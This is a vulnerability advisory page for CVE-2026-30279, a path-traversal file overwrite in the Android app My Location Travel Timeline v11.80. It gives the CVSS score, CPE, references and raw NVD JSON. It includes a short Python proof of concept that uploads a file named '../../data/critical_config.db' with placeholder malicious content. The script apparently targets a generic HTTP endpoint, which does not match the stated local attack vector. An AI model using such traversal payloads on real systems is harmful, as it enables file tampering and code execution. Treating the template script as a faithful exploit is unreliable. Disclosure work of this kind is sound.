CVE-2026-30279

Description

An arbitrary file overwrite vulnerability in Squareapps LLC My Location Travel Timeline v11.80 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:squareapps:my_location:11.80:*:*:*:*:android:*:* - VULNERABLE

Squareapps LLC My Location Travel Timeline v11.80

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Squareapps My Location Travel Timeline v11.80 - Arbitrary File Overwrite (PoC)
# Description: This script demonstrates how an attacker might overwrite a critical file.

# Target configuration
target_url = "http://target-host:port/api/import_file"

# The internal file to overwrite (e.g., a configuration or library file)
# Attackers may use path traversal techniques like '../../'
target_file = "../../data/critical_config.db"

# Malicious content to write
malicious_data = b"MALICIOUS_PAYLOAD_CONTENT"

files = {
    'file': (target_file, malicious_data, 'application/octet-stream')
}

try:
    response = requests.post(target_url, files=files)
    if response.status_code == 200:
        print("[+] File potentially overwritten successfully.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30279
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30279
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30279/
[4] VulDB https://vuldb.com/cve/CVE-2026-30279
[5] http://my.com
[6] https://github.com/Secsys-FDU/AF_CVEs/issues/28
[7] https://lightapp3.firebaseapp.com/
[8] https://secsys.fudan.edu.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30279", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:47.003", "lastModified": "2026-04-03T18:32:39.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in Squareapps LLC My Location Travel Timeline v11.80 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:squareapps:my_location:11.80:*:*:*:*:android:*:*", "matchCriteriaId": "C554AEC0-CD12-445B-B1C5-6C6913600B32"}]}]}], "references": [{"url": "http://my.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/28", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://lightapp3.firebaseapp.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}